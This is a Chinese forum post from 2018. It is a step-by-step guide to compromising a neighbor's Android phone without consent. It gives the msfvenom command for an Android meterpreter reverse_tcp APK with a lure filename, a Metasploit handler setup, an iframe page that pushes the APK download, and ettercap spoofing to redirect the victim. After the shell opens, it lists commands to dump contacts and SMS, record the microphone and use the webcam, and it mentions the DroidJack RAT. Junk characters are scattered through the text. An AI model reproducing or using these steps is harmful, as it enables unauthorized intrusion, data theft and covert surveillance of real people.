|
& t+ C( J/ u" I* V% G/ C 五、msf+ettercap入侵邻居安卓手机
+ H$ z8 d. B4 a0 W " d4 Q/ w( ^/ f1 a
6 l- I, `0 Q3 H% H 首先启动msf ! J" i1 {4 @6 L1 _7 h9 Y$ W
; D8 G) {4 Z! [7 Z7 [) `- _% G4 u9 O8 B, n" a
先用kali生成一个安卓木马,如下命令: ( d E- @1 O& e( L0 M, k& f
* L$ e2 y0 E j9 D4 m6 S
& R2 M# G; I" `. k. E; m Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 3 v7 b' v1 J7 n9 B2 C3 k
. _5 T) i1 X, R6 l# I/ Z2 C
- Z0 N; M u! D! Y  为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
* W9 ]/ z, B4 S: C$ Y. q1 z& A. L) U - X# J4 T. r, j" ^' p' H, n
* A/ J" N/ K- l2 M( i
然后进入msf # P1 L' ]. p: F2 n) L
! v, M- O, \; a# }: ^* t( n" m+ z8 z- t2 |
1 i8 z* m; Q6 R& b
use exploit/multi/handler 6 d" ^' X, o4 G6 t [
0 C) }# j! |( @$ X- L/ @3 _; o0 Q! x
/ ^7 T6 i* E3 l0 o9 _4 h! @ set payload android/meterpreter/reverse_tcp
: Q2 h& D3 E$ ?1 ?1 Q" a
" J3 q' X& w; B: ^
6 r( w0 ]0 |7 |, f* X7 Y9 ? set LHOST 192.168.0.109 //ip为kaili的ip
: Z( w/ d, G L
$ e# h0 f2 K3 [4 x% H8 D% J
! B2 W. l$ _" l0 i) e- I6 G4 z set LPORT 44444 //端口一定要与前面生成的木马的端口一致 ( x2 F) q4 {) A6 H( y
- j' Q0 |, \4 a
i0 R) H/ t& T% }" a* z2 A, c Exploit
8 ^0 P7 t! I& b2 S" a
2 {5 W) P* g C: Y; l! b/ A, v; n) j4 r9 p/ Y4 U8 v
 9 W- W: |& q6 B: n. O
; y& i' e4 I2 L# k% B3 ]0 w& s5 P& W4 {8 k
下面我们开启ettercap -G
' P& y4 M: G( l2 l. t * b' z' f2 e& L) g
% ]$ k5 K: E- k8 [0 c
我物理IP为
1 Z4 S2 ]$ Q5 l- f* [( w/ w; } : V: G& R# W, ^1 q- {& z% {
- i) l8 T4 D! m; r" R' | 
8 b2 w6 _, U2 L8 z- d# V& s7 j 1 ~5 e2 r5 {8 t9 l% y% f, r7 i' a2 s
0 V; H( @. g) j8 E
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 8 {+ B( B% G( P( F( e3 l& B. h
) \0 t4 T9 {0 c; k9 @: ^; d0 Z$ ~- p1 j7 C6 ^: t9 U- e
下面我们来设置一下 % ]% ^' d7 {5 `2 l3 i* @0 k: X
; T) {! g. R; A
4 O2 K! O. N9 K5 i+ G) t 
; x* b8 y6 r1 X. M. M
& @8 @% T' r3 V2 O' g7 x+ ? `0 T5 \; y: o
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 5 F& e$ q7 Y# j8 [; V" p" l: b6 k$ E6 C
6 e" D8 n# E' b7 k7 U
. t3 y) w( }+ @( t 8 _; d4 K( Z, @5 Z% Q# ^
$ v4 V( [5 } c7 O0 |7 F0 z6 t9 g% x7 h" q Y% W& {. a1 O8 w
 ! K" U$ c' |. l* O Q J+ J) |
5 n5 d4 ~ n& E
2 c) p$ |6 ]! a+ G5 E- I
4 v5 s% ], V" E+ Q) { + P4 J5 }7 W9 z! {% U# i
0 R" t0 L- W' Y* Z" [. b+ v
7 P, q: |4 D$ K" K
% ]/ S. c, v A2 w) R( K
9 W- x) Y& u$ y
; U* b/ N4 n5 H) s% E$ S) j
6 A) s4 X0 x1 F2 W# E: u8 |# S3 `4 |$ t0 L6 u% }5 q+ H
6 S6 I x- D+ a& d- C' n. m
/ g9 @2 x4 M% A9 q9 h0 b3 h, k* Z1 ?) w8 F+ g) a" w
1 w( \1 S" P' f& { {7 X4 ?2 l
! H2 i) [, s* A+ ]$ l$ B& u" d' `2 z# W( [; ]( g7 }2 O1 ?. }
+ H: o0 E+ }5 m. \
7 W' D7 u: L% K3 P c) ^
% h$ f" m7 A" t+ w ( k! w' p6 ?% s8 E% o
& T2 g, i4 |. _. K# s% L9 z
4 n. P- x1 L* G: v; ~
! N, K! G0 H( N! |! ?( ]3 \
: M( ]* k* }* O5 c" `- {
9 C2 R6 m( j! b# e( A/ z
- Y" k( `- X+ N n# e/ ~' c+ ~ * F# ^5 Q0 {/ i! b$ s" ?- {6 r5 Z
R: l9 n( S+ g9 E
) e0 P2 H3 T$ ?) N/ j
" s$ o! M4 J$ @9 |; [( E! K7 L
1 k& q( B7 b+ s( E  3 [8 [ n! a! v. ]/ ?' m# i' q
" ?( u" a9 o+ o6 ~% V" I4 e0 I( Z1 M- o7 f
下面我们开始攻击 # g8 I; X) x' U; k
3 q2 m. Y4 M7 E! Y z4 ]
) D' Q/ w# A! z0 H1 M: }
( L2 |3 _( y0 W- w 6 d& [4 _! e% C) V
. E; I7 [9 ]' |: p0 f+ i# ]( Y
9 O# H6 p. Q u6 K( j F3 I9 p
8 Q8 P( s- |1 S2 _6 @( h& z6 W
1 r- y( E0 F/ _) g& h ( w1 |/ o+ \$ O
8 c% f+ \3 k9 K, w( X: |- [
~) o5 C, R7 a) v( K2 A \8 m$ J( s' g1 @2 b3 M
, h# [$ g, H/ N2 Y$ X2 ^
+ F) @$ y9 V/ z* L5 Y% r( V
O5 ~. I \& T! A% Q
8 m2 u4 Z f' K# l
. }9 {% L2 e) a3 J, E 大概过了5分钟多,发现反弹成功了
I# j& d$ z% o* k& \ r
0 @2 W! K4 W, Z3 E5 ^/ f' [! b+ e% N$ O5 v) R) N: l
% x% @" V# C7 |( U! {! o/ u * O! W4 F2 p' L4 c3 U
3 K d% g8 }0 c% O* w
' q8 N" P; @: ]& j p# B5 l ( x9 ?% L6 y+ q) e' i
" ]+ ?/ z c" s( O+ f
8 B6 i9 ]' B7 w$ t& V
4 z7 y0 n- _: g
% z$ c ~ Y" T' C* J" M2 j, a , q* ]# P$ k$ I$ R. _% O5 B
& L) j8 P0 p) b$ l: D: @8 {
$ j0 s# T, `( O: S, l) M2 B5 k * x2 Q( [0 a6 c$ _& S" H
, d6 D, R" r* P8 h/ i5 f; W2 T: [0 [7 P& r3 F2 X
: U+ h( J. v" z9 v
* \% w7 c- U* K& X: s/ B
: I2 V3 L/ w4 p- I+ J" Y 
C3 L# `7 S M% g! E 9 o4 N p( v7 I7 w! I6 V- _
' h' Y2 g3 K& _2 z$ l 执行命令 : @( X* S' X. a# m1 U+ T4 V
7 ?& _4 H" I) E# J
. Z6 N! V. e0 y
4 D1 Q! k3 X8 o3 H/ ~ {7 y3 D) ^ ' M: q9 P6 O+ U" |: X; W. ]
6 g2 X+ J/ n3 H* m1 E/ p dump_contacts --》这个是导出电话 . R8 j* ^2 D9 b7 I5 S8 ^8 N
* C, ?1 x' r/ Z$ u9 W2 t. k6 ~3 R8 a
. v; F9 h7 ^; z/ r1 j dump_sms --》这个是导出信息
2 v8 s# D$ y# ~+ K7 @: l . @* c- \- ?# e1 |9 W1 ~
8 G6 R8 U3 c: ]3 L" w
record_mic Record audio from the default microphone for X seconds . v. y* C! z* m: C5 `; }* k" ?# }! W
6 `3 q8 T. s% ]# p
5 U- g. Y, e$ {$ o webcam_chat Start a video chat ) ]" |" U) r! h/ v
2 C7 Z* m) C9 d" e# ~5 F
9 ]( i. Z) W3 U webcam_list List webcams ! Q/ o; M) F" h" w, V+ v( h
) [0 C4 e6 I! f8 h( Q
' M5 v6 w; p7 m& O1 l% _# R1 ~ webcam_snap Take a snapshot from the specified webcam
& Q3 K6 K, r& O * N q& B5 f6 n0 r" |* j
+ `, }9 q' Q# _' O- k! V webcam_stream  lay a video stream from the specified webcam 5 D1 Q( ~, @( G0 ]! x2 g: A; r' H2 R
$ {4 K* V! ]) A: q
/ O8 G* b( D5 N$ v% Q0 B1 u( w/ y
 / J7 k8 {* y! }% e K$ O3 Z: G
R- c$ Y/ R! k" @
0 Q/ M; E0 I" W 
2 \5 v- e- i4 D7 R
1 Y: p3 m# \, T6 `* p8 s! U8 |5 i) w, Q
我们打开看一下电话薄,
, L8 q+ b! Y% H% v/ Y+ D8 A 1 E5 p. A; o9 y, ?& E8 e
8 x7 m5 t$ w) { ' N g* C5 Y8 g* O
* ]& t# ?! J& N9 I) q# \
' g1 `2 H! U2 h1 b- l1 Q  . c7 w& ]) b1 N g
1 o% T& ^; `$ o# {7 @: `4 E1 [$ S% S. I7 v; Y4 N' @& U' B. X
|5 K" y3 X6 Q. j# w
* K1 t6 N3 F I! w
5 W* c# T1 ?) I- {; `) x' A0 F# B  $ h; w& V [3 R
0 C9 e$ P1 r) K) Q) w1 J) j! Q; H3 T1 W0 C7 y: k( z+ D
) p8 u3 a- n# _8 j8 _: J e
: o6 B- e6 @' D" ?" a. t
: p% T; i d0 r1 e" y 6 z: Z4 s# g' u: B1 v% M# g, J) X
6 r3 `; O4 [5 z% e: L
) f# s3 K6 k* B% z9 p 我们同时欺骗成DroidJack木马,使用方法如图:
( w5 N; l4 K. a- Y/ c) Q 5 w: A' o1 j+ u
. @. t$ I! a F1 s, O8 b1 u% w" b
 5 s( @ I2 U0 ]" T2 G; v
( Q: a4 ^: J+ O) F) ]. N. K# R5 }. _& [
: t6 d& ^0 {3 s9 p! s& l $ S! |2 w0 |" H
0 {+ z7 E2 c/ b! n
. j/ @7 Y4 ?# J
: k' J1 w1 _% J* K, Y
I. i9 D7 d9 b/ Z0 I* e 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 - [" z8 q: {4 W
- j3 r9 ?2 T/ s& Z
% J. I6 z% O) Z. C4 ?
 " J0 H) u3 R) Y# y; O# E
5 O9 i: n( P! F. z$ ~ a @
) ]: t. y: g% K, \2 B/ s6 u, C4 f3 ]
 * t3 o- Q9 V' Q1 S* e) H
1 k# y9 f9 p- a# L- Z
" N2 W6 h% E7 L0 V 
7 Z( I/ ?4 m, P% x
# p+ R: `' d$ a: c7 u9 q w
* K- v, c" f i   2 Y$ W: V( g. W4 i
) R' _6 m& \1 b
! F$ B9 R- W' A3 c) H/ M
; G: n/ C1 R2 _( v, e& H+ V! k | 
发表于 2018-10-20 20:30:37
收藏
支持
反对